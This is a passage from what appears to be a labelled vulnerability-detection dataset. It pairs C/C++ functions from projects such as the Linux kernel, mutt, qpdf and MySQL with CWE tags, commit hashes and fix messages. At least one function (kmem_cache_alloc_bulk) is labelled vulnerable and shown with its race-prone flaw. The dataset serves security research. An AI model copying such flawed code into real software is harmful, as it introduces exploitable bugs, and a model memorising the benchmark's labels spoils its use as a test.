rfbLog(" ... closing connection\n");
rfbCloseClient(cl);
return;
}
}
}
| 0 |
[] |
libvncserver
|
804335f9d296440bb708ca844f5d89b58b50b0c6
| 300,301,677,235,870,000,000,000,000,000,000,000,000 | 622 |
Thread safety for zrle, zlib, tight.
Proposed tight security type fix for debian bug 517422.
|
R_API void r_bin_set_baddr(RBin *bin, ut64 baddr) {
RBinObject *o = r_bin_cur_object (bin);
binobj_set_baddr (o, baddr);
// XXX - update all the infos?
}
| 0 |
[
"CWE-125"
] |
radare2
|
d31c4d3cbdbe01ea3ded16a584de94149ecd31d9
| 285,977,869,512,834,530,000,000,000,000,000,000,000 | 5 |
Fix #8748 - Fix oobread on string search
|
GC_API void * GC_CALL GC_malloc_atomic_ignore_off_page(size_t lb)
{
return((void *)GC_generic_malloc_ignore_off_page(lb, PTRFREE));
}
| 0 |
[
"CWE-189"
] |
bdwgc
|
be9df82919960214ee4b9d3313523bff44fd99e1
| 267,344,377,676,232,000,000,000,000,000,000,000,000 | 4 |
Fix allocation size overflows due to rounding.
* malloc.c (GC_generic_malloc): Check if the allocation size is
rounded to a smaller value.
* mallocx.c (GC_generic_malloc_ignore_off_page): Likewise.
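A minimal sketch of the check being described (hypothetical granule size; the collector's real rounding helpers differ): after rounding a request up to the allocation granule, a result smaller than the request means the addition wrapped around.

```c
#include <stddef.h>

#define GRANULE 16  /* hypothetical allocation granule */

/* Round lb up to a multiple of GRANULE; return 0 on overflow so the
 * caller can fail the allocation instead of allocating too little. */
static size_t round_up_checked(size_t lb)
{
    size_t rounded = (lb + (GRANULE - 1)) & ~(size_t)(GRANULE - 1);

    if (rounded < lb)
        return 0;  /* wrapped: the rounded size is smaller than asked */
    return rounded;
}
```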
|
zsetalphaisshape(i_ctx_t *i_ctx_p)
{
os_ptr op = osp;
check_type(*op, t_boolean);
gs_setalphaisshape(igs, op->value.boolval);
pop(1);
return 0;
}
| 0 |
[
"CWE-704"
] |
ghostpdl
|
548bb434e81dadcc9f71adf891a3ef5bea8e2b4e
| 35,562,288,107,334,746,000,000,000,000,000,000,000 | 10 |
PS interpreter - add some type checking
These were 'probably' safe anyway, since they mostly treat the objects
as integers without checking, which at least can't result in a crash.
Nevertheless, we ought to check.
The return from comparedictkeys could be wrong if one of the keys had
a value which was not an array; it could incorrectly decide the two
were in fact the same.
|
static NetworkInterface* handle_null_interface(lua_State* vm) {
char allowed_ifname[MAX_INTERFACE_NAME_LEN];
ntop->getTrace()->traceEvent(TRACE_INFO, "NULL interface: did you restart ntopng in the meantime?");
if(ntop->getInterfaceAllowed(vm, allowed_ifname)) {
return ntop->getNetworkInterface(allowed_ifname);
}
return(ntop->getInterfaceAtId(0));
}
| 0 |
[
"CWE-476"
] |
ntopng
|
01f47e04fd7c8d54399c9e465f823f0017069f8f
| 260,240,327,859,568,300,000,000,000,000,000,000,000 | 11 |
Security fix: prevents empty host from being used
|
static int ssl_passwd_cb(char *buf, int size, int rwflag, void *userdata)
{
ACCOUNT *account = (ACCOUNT*)userdata;
if (mutt_account_getuser (account))
return 0;
dprint (2, (debugfile, "ssl_passwd_cb: getting password for %s@%s:%u\n",
account->user, account->host, account->port));
if (mutt_account_getpass (account))
return 0;
return snprintf(buf, size, "%s", account->pass);
}
| 0 |
[
"CWE-74"
] |
mutt
|
c547433cdf2e79191b15c6932c57f1472bfb5ff4
| 232,640,254,045,549,250,000,000,000,000,000,000,000 | 15 |
Fix STARTTLS response injection attack.
Thanks again to Damian Poddebniak and Fabian Ising from the Münster
University of Applied Sciences for reporting this issue. Their
summary in ticket 248 states the issue clearly:
We found another STARTTLS-related issue in Mutt. Unfortunately, it
affects SMTP, POP3 and IMAP.
When the server responds with its "let's do TLS now message", e.g. A
OK begin TLS\r\n in IMAP or +OK begin TLS\r\n in POP3, Mutt will
also read any data after the \r\n and save it into some internal
buffer for later processing. This is problematic, because a MITM
attacker can inject arbitrary responses.
There is a nice blogpost by Wietse Venema about a "command
injection" in postfix (http://www.postfix.org/CVE-2011-0411.html).
What we have here is the problem in reverse, i.e. not a command
injection, but a "response injection."
This commit fixes the issue by clearing the CONNECTION input buffer in
mutt_ssl_starttls().
To make backporting this fix easier, the new functions only clear the
top-level CONNECTION buffer; they don't handle nested buffering in
mutt_zstrm.c or mutt_sasl.c. However both of those wrap the
connection *after* STARTTLS, so this is currently okay. mutt_tunnel.c
occurs before connecting, but it does not perform any nesting.
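As a sketch of the fix's shape (hypothetical connection struct; mutt's actual CONNECTION fields differ), the buffered plaintext input is simply discarded between the server's go-ahead and the TLS handshake:

```c
#include <stddef.h>

/* Hypothetical buffered connection: bytes [pos, used) are unread. */
struct conn {
    char   inbuf[4096];
    size_t pos;
    size_t used;
};

/* Drop anything a MITM may have appended after the "begin TLS" line;
 * the TLS layer must start reading from the raw socket, not from
 * attacker-controlled plaintext leftovers. */
static void conn_clear_input(struct conn *c)
{
    c->pos  = 0;
    c->used = 0;
}
```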
|
int kmem_cache_alloc_bulk(struct kmem_cache *s, gfp_t flags, size_t size,
void **p)
{
struct kmem_cache_cpu *c;
int i;
/* memcg and kmem_cache debug support */
s = slab_pre_alloc_hook(s, flags);
if (unlikely(!s))
return false;
/*
* Drain objects in the per cpu slab, while disabling local
* IRQs, which protects against PREEMPT and interrupts
* handlers invoking normal fastpath.
*/
local_irq_disable();
c = this_cpu_ptr(s->cpu_slab);
for (i = 0; i < size; i++) {
void *object = c->freelist;
if (unlikely(!object)) {
/*
* Invoking the slow path likely has the side effect
* of re-populating the per-CPU c->freelist
*/
p[i] = ___slab_alloc(s, flags, NUMA_NO_NODE,
_RET_IP_, c);
if (unlikely(!p[i]))
goto error;
c = this_cpu_ptr(s->cpu_slab);
maybe_wipe_obj_freeptr(s, p[i]);
continue; /* goto for-loop */
}
c->freelist = get_freepointer(s, object);
p[i] = object;
maybe_wipe_obj_freeptr(s, p[i]);
}
c->tid = next_tid(c->tid);
local_irq_enable();
/* Clear memory outside IRQ disabled fastpath loop */
if (unlikely(slab_want_init_on_alloc(flags, s))) {
int j;
for (j = 0; j < i; j++)
memset(p[j], 0, s->object_size);
}
/* memcg and kmem_cache debug support */
slab_post_alloc_hook(s, flags, size, p);
return i;
error:
local_irq_enable();
slab_post_alloc_hook(s, flags, i, p);
__kmem_cache_free_bulk(s, i, p);
return 0;
}
| 1 |
[] |
linux
|
fd4d9c7d0c71866ec0c2825189ebd2ce35bd95b8
| 124,517,195,750,956,520,000,000,000,000,000,000,000 | 60 |
mm: slub: add missing TID bump in kmem_cache_alloc_bulk()
When kmem_cache_alloc_bulk() attempts to allocate N objects from a percpu
freelist of length M, and N > M > 0, it will first remove the M elements
from the percpu freelist, then call ___slab_alloc() to allocate the next
element and repopulate the percpu freelist. ___slab_alloc() can re-enable
IRQs via allocate_slab(), so the TID must be bumped before ___slab_alloc()
to properly commit the freelist head change.
Fix it by unconditionally bumping c->tid when entering the slowpath.
Cc: [email protected]
Fixes: ebe909e0fdb3 ("slub: improve bulk alloc strategy")
Signed-off-by: Jann Horn <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
static void test_ts()
{
MYSQL_STMT *stmt;
MYSQL_BIND my_bind[6];
MYSQL_TIME ts;
MYSQL_RES *prep_res;
char strts[30];
ulong length;
int rc, field_count;
char name;
char query[MAX_TEST_QUERY_LENGTH];
const char *queries [3]= {"SELECT a, b, c FROM test_ts WHERE %c=?",
"SELECT a, b, c FROM test_ts WHERE %c=CAST(? AS TIME)",
"SELECT a, b, c FROM test_ts WHERE %c=CAST(? AS DATE)"};
myheader("test_ts");
rc= mysql_query(mysql, "DROP TABLE IF EXISTS test_ts");
myquery(rc);
rc= mysql_query(mysql, "CREATE TABLE test_ts(a DATE, b TIME, c TIMESTAMP)");
myquery(rc);
stmt= mysql_simple_prepare(mysql, "INSERT INTO test_ts VALUES(?, ?, ?), (?, ?, ?)");
check_stmt(stmt);
ts.year= 2003;
ts.month= 07;
ts.day= 12;
ts.hour= 21;
ts.minute= 07;
ts.second= 46;
ts.second_part= 0;
length= (long)(strmov(strts, "2003-07-12 21:07:46") - strts);
/*
We need to bzero bind structure because mysql_stmt_bind_param checks all
its members.
*/
bzero((char*) my_bind, sizeof(my_bind));
my_bind[0].buffer_type= MYSQL_TYPE_TIMESTAMP;
my_bind[0].buffer= (void *)&ts;
my_bind[0].buffer_length= sizeof(ts);
my_bind[2]= my_bind[1]= my_bind[0];
my_bind[3].buffer_type= MYSQL_TYPE_STRING;
my_bind[3].buffer= (void *)strts;
my_bind[3].buffer_length= sizeof(strts);
my_bind[3].length= &length;
my_bind[5]= my_bind[4]= my_bind[3];
rc= mysql_stmt_bind_param(stmt, my_bind);
check_execute(stmt, rc);
rc= mysql_stmt_execute(stmt);
check_execute(stmt, rc);
mysql_stmt_close(stmt);
verify_col_data("test_ts", "a", "2003-07-12");
verify_col_data("test_ts", "b", "21:07:46");
verify_col_data("test_ts", "c", "2003-07-12 21:07:46");
stmt= mysql_simple_prepare(mysql, "SELECT * FROM test_ts");
check_stmt(stmt);
prep_res= mysql_stmt_result_metadata(stmt);
mytest(prep_res);
rc= mysql_stmt_execute(stmt);
check_execute(stmt, rc);
rc= my_process_stmt_result(stmt);
DIE_UNLESS(rc == 2);
field_count= mysql_num_fields(prep_res);
mysql_free_result(prep_res);
mysql_stmt_close(stmt);
for (name= 'a'; field_count--; name++)
{
int row_count= 0;
sprintf(query, queries[field_count], name);
if (!opt_silent)
fprintf(stdout, "\n %s", query);
stmt= mysql_simple_prepare(mysql, query);
check_stmt(stmt);
rc= mysql_stmt_bind_param(stmt, my_bind);
check_execute(stmt, rc);
rc= mysql_stmt_execute(stmt);
check_execute(stmt, rc);
while (mysql_stmt_fetch(stmt) == 0)
row_count++;
if (!opt_silent)
fprintf(stdout, "\n returned '%d' rows", row_count);
DIE_UNLESS(row_count == 2);
mysql_stmt_close(stmt);
}
}
| 0 |
[
"CWE-416"
] |
server
|
eef21014898d61e77890359d6546d4985d829ef6
| 69,850,087,374,890,800,000,000,000,000,000,000,000 | 107 |
MDEV-11933 Wrong usage of linked list in mysql_prune_stmt_list
mysql_prune_stmt_list() was walking the list following
element->next pointers, but inside the loop it was invoking
list_add(element) that modified element->next. So, mysql_prune_stmt_list()
failed to visit and reset all elements, and some of them were left
with pointers to invalid MYSQL.
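The general rule the fix applies can be shown with a small C sketch (hypothetical list type): when the loop body may relink the current element, the successor must be saved before the mutation.

```c
#include <stddef.h>

struct node {
    struct node *next;
};

/* `relink` may overwrite el->next (as list_add() did in the bug), so
 * capture the successor first; otherwise the walk follows the new,
 * wrong chain and skips elements. */
static void visit_all(struct node *head, void (*relink)(struct node *))
{
    struct node *el = head;

    while (el != NULL) {
        struct node *next = el->next;  /* save before relink() runs */

        relink(el);
        el = next;
    }
}
```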
|
void qpdf_set_object_stream_mode(qpdf_data qpdf, qpdf_object_stream_e mode)
{
QTC::TC("qpdf", "qpdf-c called qpdf_set_object_stream_mode");
qpdf->qpdf_writer->setObjectStreamMode(mode);
}
| 0 |
[
"CWE-787"
] |
qpdf
|
d71f05ca07eb5c7cfa4d6d23e5c1f2a800f52e8e
| 213,839,327,226,694,700,000,000,000,000,000,000,000 | 5 |
Fix sign and conversion warnings (major)
This makes all integer type conversions that have potential data loss
explicit with calls that do range checks and raise an exception. After
this commit, qpdf builds with no warnings when -Wsign-conversion
-Wconversion is used with gcc or clang or when -W3 -Wd4800 is used
with MSVC. This significantly reduces the likelihood of potential
crashes from bogus integer values.
There are some parts of the code that take int when they should take
size_t or an offset. Such places would make qpdf not support files
with more than 2^31 of something that usually wouldn't be so large. In
the event that such a file shows up and is valid, at least qpdf would
raise an error in the right spot so the issue could be legitimately
addressed rather than failing in some weird way because of a silent
overflow condition.
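qpdf implements this with its own checked-conversion helpers; as a sketch of the idea in C (hypothetical helper name, not qpdf's API), a narrowing conversion is permitted only when the value is representable:

```c
#include <limits.h>
#include <stdbool.h>
#include <stdint.h>

/* Return true and store the narrowed value only if it fits; otherwise
 * the caller reports a range error instead of silently truncating or
 * wrapping. */
static bool to_int_checked(int64_t value, int *out)
{
    if (value < INT_MIN || value > INT_MAX)
        return false;
    *out = (int)value;
    return true;
}
```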
|
static ssize_t qcow_preadv(struct bdev *bdev, struct iovec *iov, int iovcnt, off_t offset)
{
uint64_t cluster_offset;
uint64_t sector_index;
uint64_t sector_count;
uint64_t sector_num, n;
ssize_t read;
struct qcow_state *s = bdev->private;
struct iovec _iov[iovcnt];
size_t _cnt;
size_t _off = 0;
size_t count = tcmu_iovec_length(iov, iovcnt);
assert(!(count & 511));
sector_count = count / 512;
sector_num = offset >> 9;
while (sector_count) {
sector_index = sector_num & (s->cluster_sectors - 1);
n = min(sector_count, (s->cluster_sectors - sector_index));
_cnt = iovec_segment(iov, _iov, _off, n * 512);
cluster_offset = get_cluster_offset(s, sector_num << 9, false);
if (!cluster_offset) {
if (!s->backing_image) {
/* read unallocated sectors as 0s */
iovec_memset(_iov, _cnt, 0, 512 * n);
} else {
/* pass through to backing file */
read = s->backing_image->ops->preadv(s->backing_image,
_iov, _cnt,
(off_t) sector_num * 512);
if (read != n * 512)
break;
}
} else if (cluster_offset == QCOW2_OFLAG_ZERO) {
/* cluster discarded, read as 0s */
iovec_memset(_iov, _cnt, 0, 512 * n);
} else if (cluster_offset & s->cluster_compressed) {
if (decompress_cluster(s, cluster_offset) < 0) {
tcmu_err("decompression failure\n");
return -1;
}
tcmu_memcpy_into_iovec(_iov, _cnt, s->cluster_cache + sector_index * 512, 512 * n);
} else {
read = preadv(bdev->fd, _iov, _cnt, cluster_offset + (sector_index * 512));
if (read != n * 512)
break;
}
sector_count -= n;
sector_num += n;
_off += n * 512;
}
return _off ? _off : -1;
}
| 0 |
[
"CWE-200"
] |
tcmu-runner
|
8cf8208775022301adaa59c240bb7f93742d1329
| 301,223,770,518,275,300,000,000,000,000,000,000,000 | 59 |
removed all check_config callback implementations to avoid security issues
see github issue #194
qcow.c contained an information leak: it could test for the existence of any
file in the system.
file_example.c and file_optical.c also allow testing for the existence of
any file, plus temporarily creating empty new files anywhere in the
file system. This also involves a race condition: if a file didn't exist
in the first place but was created in the meantime by some other
process, the file would then be deleted by the check_config
implementation.
|
void cfg80211_sta_opmode_change_notify(struct net_device *dev, const u8 *mac,
struct sta_opmode_info *sta_opmode,
gfp_t gfp)
{
struct sk_buff *msg;
struct wireless_dev *wdev = dev->ieee80211_ptr;
struct cfg80211_registered_device *rdev = wiphy_to_rdev(wdev->wiphy);
void *hdr;
if (WARN_ON(!mac))
return;
msg = nlmsg_new(NLMSG_DEFAULT_SIZE, gfp);
if (!msg)
return;
hdr = nl80211hdr_put(msg, 0, 0, 0, NL80211_CMD_STA_OPMODE_CHANGED);
if (!hdr) {
nlmsg_free(msg);
return;
}
if (nla_put_u32(msg, NL80211_ATTR_WIPHY, rdev->wiphy_idx))
goto nla_put_failure;
if (nla_put_u32(msg, NL80211_ATTR_IFINDEX, dev->ifindex))
goto nla_put_failure;
if (nla_put(msg, NL80211_ATTR_MAC, ETH_ALEN, mac))
goto nla_put_failure;
if ((sta_opmode->changed & STA_OPMODE_SMPS_MODE_CHANGED) &&
nla_put_u8(msg, NL80211_ATTR_SMPS_MODE, sta_opmode->smps_mode))
goto nla_put_failure;
if ((sta_opmode->changed & STA_OPMODE_MAX_BW_CHANGED) &&
nla_put_u8(msg, NL80211_ATTR_CHANNEL_WIDTH, sta_opmode->bw))
goto nla_put_failure;
if ((sta_opmode->changed & STA_OPMODE_N_SS_CHANGED) &&
nla_put_u8(msg, NL80211_ATTR_NSS, sta_opmode->rx_nss))
goto nla_put_failure;
genlmsg_end(msg, hdr);
genlmsg_multicast_netns(&nl80211_fam, wiphy_net(&rdev->wiphy), msg, 0,
NL80211_MCGRP_MLME, gfp);
return;
nla_put_failure:
nlmsg_free(msg);
}
| 0 |
[
"CWE-120"
] |
linux
|
f88eb7c0d002a67ef31aeb7850b42ff69abc46dc
| 255,396,611,251,205,020,000,000,000,000,000,000,000 | 53 |
nl80211: validate beacon head
We currently don't validate the beacon head, i.e. the header,
fixed part and elements that are to go in front of the TIM
element. This means that the variable elements there can be
malformed, e.g. have a length exceeding the buffer size, but
most downstream code from this assumes that this has already
been checked.
Add the necessary checks to the netlink policy.
Cc: [email protected]
Fixes: ed1b6cc7f80f ("cfg80211/nl80211: add beacon settings")
Link: https://lore.kernel.org/r/1569009255-I7ac7fbe9436e9d8733439eab8acbbd35e55c74ef@changeid
Signed-off-by: Johannes Berg <[email protected]>
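The essence of the added validation can be sketched in a few lines of standalone C (not the netlink-policy code itself): walk the information elements' 2-byte TLV headers and reject any element whose declared length runs past the buffer.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Each element is: u8 id, u8 len, then `len` bytes of payload. */
static bool elements_are_valid(const uint8_t *ies, size_t len)
{
    size_t pos = 0;

    while (pos + 2 <= len) {           /* need id + length bytes */
        uint8_t elen = ies[pos + 1];

        if (pos + 2 + elen > len)
            return false;              /* element overruns the buffer */
        pos += 2 + elen;
    }
    return pos == len;                 /* no truncated trailing header */
}
```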
|
static void corsair_remove(struct hid_device *dev)
{
k90_cleanup_macro_functions(dev);
k90_cleanup_backlight(dev);
hid_hw_stop(dev);
}
| 0 |
[
"CWE-399",
"CWE-119"
] |
linux
|
6d104af38b570d37aa32a5803b04c354f8ed513d
| 252,656,821,011,667,400,000,000,000,000,000,000,000 | 7 |
HID: corsair: fix DMA buffers on stack
Not all platforms support DMA to the stack, and specifically since v4.9
this is no longer supported on x86 with VMAP_STACK either.
Note that the macro-mode buffer was larger than necessary.
Fixes: 6f78193ee9ea ("HID: corsair: Add Corsair Vengeance K90 driver")
Cc: stable <[email protected]>
Signed-off-by: Johan Hovold <[email protected]>
Signed-off-by: Jiri Kosina <[email protected]>
|
static void __io_fail_links(struct io_kiocb *req)
{
struct io_ring_ctx *ctx = req->ctx;
while (!list_empty(&req->link_list)) {
struct io_kiocb *link = list_first_entry(&req->link_list,
struct io_kiocb, link_list);
list_del_init(&link->link_list);
trace_io_uring_fail_link(req, link);
io_cqring_fill_event(link, -ECANCELED);
link->flags |= REQ_F_COMP_LOCKED;
__io_double_put_req(link);
req->flags &= ~REQ_F_LINK_TIMEOUT;
}
io_commit_cqring(ctx);
io_cqring_ev_posted(ctx);
}
| 0 |
[] |
linux
|
0f2122045b946241a9e549c2a76cea54fa58a7ff
| 333,801,506,736,109,130,000,000,000,000,000,000,000 | 20 |
io_uring: don't rely on weak ->files references
Grab actual references to the files_struct. To avoid circular references
issues due to this, we add a per-task note that keeps track of what
io_uring contexts a task has used. When the task execs or exits its
assigned files, we cancel requests based on this tracking.
With that, we can grab proper references to the files table, and no
longer need to rely on stashing away ring_fd and ring_file to check
if the ring_fd may have been closed.
Cc: [email protected] # v5.5+
Reviewed-by: Pavel Begunkov <[email protected]>
Signed-off-by: Jens Axboe <[email protected]>
|
static void sctp_do_8_2_transport_strike(sctp_cmd_seq_t *commands,
struct sctp_association *asoc,
struct sctp_transport *transport,
int is_hb)
{
/* The check for association's overall error counter exceeding the
* threshold is done in the state function.
*/
/* We are here due to a timer expiration. If the timer was
* not a HEARTBEAT, then normal error tracking is done.
* If the timer was a heartbeat, we only increment error counts
* when we already have an outstanding HEARTBEAT that has not
* been acknowledged.
* Additionally, some transport states inhibit error increments.
*/
if (!is_hb) {
asoc->overall_error_count++;
if (transport->state != SCTP_INACTIVE)
transport->error_count++;
} else if (transport->hb_sent) {
if (transport->state != SCTP_UNCONFIRMED)
asoc->overall_error_count++;
if (transport->state != SCTP_INACTIVE)
transport->error_count++;
}
/* If the transport error count is greater than the pf_retrans
* threshold, and less than pathmaxrxt, then mark this transport
* as Partially Failed; see SCTP Quick Failover Draft, section 5.1,
* point 1
*/
if ((transport->state != SCTP_PF) &&
(asoc->pf_retrans < transport->pathmaxrxt) &&
(transport->error_count > asoc->pf_retrans)) {
sctp_assoc_control_transport(asoc, transport,
SCTP_TRANSPORT_PF,
0);
/* Update the hb timer to resend a heartbeat every rto */
sctp_cmd_hb_timer_update(commands, transport);
}
if (transport->state != SCTP_INACTIVE &&
(transport->error_count > transport->pathmaxrxt)) {
SCTP_DEBUG_PRINTK_IPADDR("transport_strike:association %p",
" transport IP: port:%d failed.\n",
asoc,
(&transport->ipaddr),
ntohs(transport->ipaddr.v4.sin_port));
sctp_assoc_control_transport(asoc, transport,
SCTP_TRANSPORT_DOWN,
SCTP_FAILED_THRESHOLD);
}
/* E2) For the destination address for which the timer
* expires, set RTO <- RTO * 2 ("back off the timer"). The
* maximum value discussed in rule C7 above (RTO.max) may be
* used to provide an upper bound to this doubling operation.
*
* Special Case: the first HB doesn't trigger exponential backoff.
* The first unacknowledged HB triggers it. We do this with a flag
* that indicates that we have an outstanding HB.
*/
if (!is_hb || transport->hb_sent) {
transport->rto = min((transport->rto * 2), transport->asoc->rto_max);
sctp_max_rto(asoc, transport);
}
}
| 0 |
[] |
linux
|
196d67593439b03088913227093e374235596e33
| 225,117,006,226,926,300,000,000,000,000,000,000,000 | 69 |
sctp: Add support to per-association statistics via a new SCTP_GET_ASSOC_STATS call
The current SCTP stack is lacking a mechanism to have per association
statistics. This is an implementation modeled after OpenSolaris'
SCTP_GET_ASSOC_STATS.
Userspace part will follow on lksctp if/when there is a general ACK on
this.
V4:
- Move ipackets++ before q->immediate.func() for consistency reasons
- Move sctp_max_rto() at the end of sctp_transport_update_rto() to avoid
returning bogus RTO values
- return asoc->rto_min when max_obs_rto value has not changed
V3:
- Increase ictrlchunks in sctp_assoc_bh_rcv() as well
- Move ipackets++ to sctp_inq_push()
- return 0 when no rto updates took place since the last call
V2:
- Implement partial retrieval of stat struct to cope for future expansion
- Kill the rtxpackets counter as it cannot be precise anyway
- Rename outseqtsns to outofseqtsns to make it clearer that these are out
of sequence unexpected TSNs
- Move asoc->ipackets++ under a lock to avoid potential miscounts
- Fold asoc->opackets++ into the already existing asoc check
- Kill unneeded (q->asoc) test when increasing rtxchunks
- Do not count octrlchunks if sending failed (SCTP_XMIT_OK != 0)
- Don't count SHUTDOWNs as SACKs
- Move SCTP_GET_ASSOC_STATS to the private space API
- Adjust the len check in sctp_getsockopt_assoc_stats() to allow for
future struct growth
- Move association statistics in their own struct
- Update idupchunks when we send a SACK with dup TSNs
- return min_rto in max_rto when RTO has not changed. Also return the
transport when max_rto last changed.
Signed-off: Michele Baldessari <[email protected]>
Acked-by: Vlad Yasevich <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
X509_NAME *X509_get_subject_name(const X509 *a)
{
return a->cert_info.subject;
}
| 0 |
[
"CWE-476"
] |
openssl
|
8130d654d1de922ea224fa18ee3bc7262edc39c0
| 202,691,688,698,398,660,000,000,000,000,000,000,000 | 4 |
Fix Null pointer deref in X509_issuer_and_serial_hash()
The OpenSSL public API function X509_issuer_and_serial_hash() attempts
to create a unique hash value based on the issuer and serial number data
contained within an X509 certificate. However it fails to correctly
handle any errors that may occur while parsing the issuer field (which
might occur if the issuer field is maliciously constructed). This may
subsequently result in a NULL pointer deref and a crash leading to a
potential denial of service attack.
The function X509_issuer_and_serial_hash() is never directly called by
OpenSSL itself so applications are only vulnerable if they use this
function directly and they use it on certificates that may have been
obtained from untrusted sources.
CVE-2021-23841
Reviewed-by: Richard Levitte <[email protected]>
Reviewed-by: Paul Dale <[email protected]>
|
int btrfs_commit_transaction_async(struct btrfs_trans_handle *trans)
{
struct btrfs_fs_info *fs_info = trans->fs_info;
struct btrfs_async_commit *ac;
struct btrfs_transaction *cur_trans;
ac = kmalloc(sizeof(*ac), GFP_NOFS);
if (!ac)
return -ENOMEM;
INIT_WORK(&ac->work, do_async_commit);
ac->newtrans = btrfs_join_transaction(trans->root);
if (IS_ERR(ac->newtrans)) {
int err = PTR_ERR(ac->newtrans);
kfree(ac);
return err;
}
/* take transaction reference */
cur_trans = trans->transaction;
refcount_inc(&cur_trans->use_count);
btrfs_end_transaction(trans);
/*
* Tell lockdep we've released the freeze rwsem, since the
* async commit thread will be the one to unlock it.
*/
if (ac->newtrans->type & __TRANS_FREEZABLE)
__sb_writers_release(fs_info->sb, SB_FREEZE_FS);
schedule_work(&ac->work);
/*
* Wait for the current transaction commit to start and block
* subsequent transaction joins
*/
wait_event(fs_info->transaction_blocked_wait,
cur_trans->state >= TRANS_STATE_COMMIT_START ||
TRANS_ABORTED(cur_trans));
if (current->journal_info == trans)
current->journal_info = NULL;
btrfs_put_transaction(cur_trans);
return 0;
}
| 0 |
[
"CWE-703",
"CWE-667"
] |
linux
|
1cb3db1cf383a3c7dbda1aa0ce748b0958759947
| 145,435,962,710,360,150,000,000,000,000,000,000,000 | 45 |
btrfs: fix deadlock with concurrent chunk allocations involving system chunks
When a task attempting to allocate a new chunk verifies that there is not
currently enough free space in the system space_info and there is another
task that allocated a new system chunk but has not yet finished the
creation of the respective block group, it waits for that other task to
finish creating the block group. This is to avoid exhaustion of the system
chunk array in the superblock, which is limited, when we have a thundering
herd of tasks allocating new chunks. This problem was described and fixed
by commit eafa4fd0ad0607 ("btrfs: fix exhaustion of the system chunk array
due to concurrent allocations").
However there are two very similar scenarios where this can lead to a
deadlock:
1) Task B allocated a new system chunk and task A is waiting on task B
to finish creation of the respective system block group. However before
task B ends its transaction handle and finishes the creation of the
system block group, it attempts to allocate another chunk (like a data
chunk for an fallocate operation for a very large range). Task B will
be unable to progress and allocate the new chunk, because task A set
space_info->chunk_alloc to 1 and therefore it loops at
btrfs_chunk_alloc() waiting for task A to finish its chunk allocation
and set space_info->chunk_alloc to 0, but task A is waiting on task B
to finish creation of the new system block group, therefore resulting
in a deadlock;
2) Task B allocated a new system chunk and task A is waiting on task B to
finish creation of the respective system block group. By the time that
task B enter the final phase of block group allocation, which happens
at btrfs_create_pending_block_groups(), when it modifies the extent
tree, the device tree or the chunk tree to insert the items for some
new block group, it needs to allocate a new chunk, so it ends up at
btrfs_chunk_alloc() and keeps looping there because task A has set
space_info->chunk_alloc to 1, but task A is waiting for task B to
finish creation of the new system block group and release the reserved
system space, therefore resulting in a deadlock.
In short, the problem is if a task B needs to allocate a new chunk after
it previously allocated a new system chunk and if another task A is
currently waiting for task B to complete the allocation of the new system
chunk.
Unfortunately this deadlock scenario introduced by the previous fix for
the system chunk array exhaustion problem does not have a simple and short
fix, and requires a big change to rework the chunk allocation code so that
chunk btree updates are all made in the first phase of chunk allocation.
And since this deadlock regression is being frequently hit on zoned
filesystems and the system chunk array exhaustion problem is triggered
in more extreme cases (originally observed on PowerPC with a node size
of 64K when running the fallocate tests from stress-ng), revert the
changes from that commit. The next patch in the series, with a subject
of "btrfs: rework chunk allocation to avoid exhaustion of the system
chunk array" does the necessary changes to fix the system chunk array
exhaustion problem.
Reported-by: Naohiro Aota <[email protected]>
Link: https://lore.kernel.org/linux-btrfs/20210621015922.ewgbffxuawia7liz@naota-xeon/
Fixes: eafa4fd0ad0607 ("btrfs: fix exhaustion of the system chunk array due to concurrent allocations")
CC: [email protected] # 5.12+
Tested-by: Shin'ichiro Kawasaki <[email protected]>
Tested-by: Naohiro Aota <[email protected]>
Signed-off-by: Filipe Manana <[email protected]>
Tested-by: David Sterba <[email protected]>
Signed-off-by: David Sterba <[email protected]>
|
WandExport void DrawAlpha(DrawingWand *wand,const double x,const double y,
const PaintMethod paint_method)
{
assert(wand != (DrawingWand *) NULL);
assert(wand->signature == MagickWandSignature);
if (wand->debug != MagickFalse)
(void) LogMagickEvent(WandEvent,GetMagickModule(),"%s",wand->name);
(void) MVGPrintf(wand,"alpha %.20g %.20g '%s'\n",x,y,CommandOptionToMnemonic(
MagickMethodOptions,(ssize_t) paint_method));
}
| 0 |
[
"CWE-476"
] |
ImageMagick
|
6ad5fc3c9b652eec27fc0b1a0817159f8547d5d9
| 18,295,180,073,028,640,000,000,000,000,000,000,000 | 10 |
https://github.com/ImageMagick/ImageMagick/issues/716
|
static inline void enable_eprom_write(pegasus_t *pegasus)
{
__u8 tmp;
get_registers(pegasus, EthCtrl2, 1, &tmp);
set_register(pegasus, EthCtrl2, tmp | EPROM_WR_ENABLE);
}
| 0 |
[
"CWE-119",
"CWE-284"
] |
linux
|
5593523f968bc86d42a035c6df47d5e0979b5ace
| 280,623,569,247,627,300,000,000,000,000,000,000,000 | 7 |
pegasus: Use heap buffers for all register access
Allocating USB buffers on the stack is not portable, and no longer
works on x86_64 (with VMAP_STACK enabled as per default).
Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
References: https://bugs.debian.org/852556
Reported-by: Lisandro Damián Nicanor Pérez Meyer <[email protected]>
Tested-by: Lisandro Damián Nicanor Pérez Meyer <[email protected]>
Signed-off-by: Ben Hutchings <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
nm_utils_read_link_absolute(const char *link_file, GError **error)
{
char *ln, *dirname, *ln_abs;
ln = g_file_read_link(link_file, error);
if (!ln)
return NULL;
if (g_path_is_absolute(ln))
return ln;
dirname = g_path_get_dirname(link_file);
if (!g_path_is_absolute(dirname)) {
gs_free char *current_dir = g_get_current_dir();
/* @link_file argument was not an absolute path in the first place.
* That actually may be a bug, because the CWD is not well defined
* in most cases. Anyway, apparently we were able to load the file
* even from a relative path. So, when making the link absolute, we
* also need to prepend the CWD. */
ln_abs = g_build_filename(current_dir, dirname, ln, NULL);
} else
ln_abs = g_build_filename(dirname, ln, NULL);
g_free(dirname);
g_free(ln);
return ln_abs;
}
| 0 |
[
"CWE-20"
] |
NetworkManager
|
420784e342da4883f6debdfe10cde68507b10d27
| 327,964,475,373,399,780,000,000,000,000,000,000,000 | 26 |
core: fix crash in nm_wildcard_match_check()
It's not entirely clear how to treat %NULL.
Clearly "match.interface-name=eth0" should not
match with an interface %NULL. But what about
"match.interface-name=!eth0"? It's now implemented
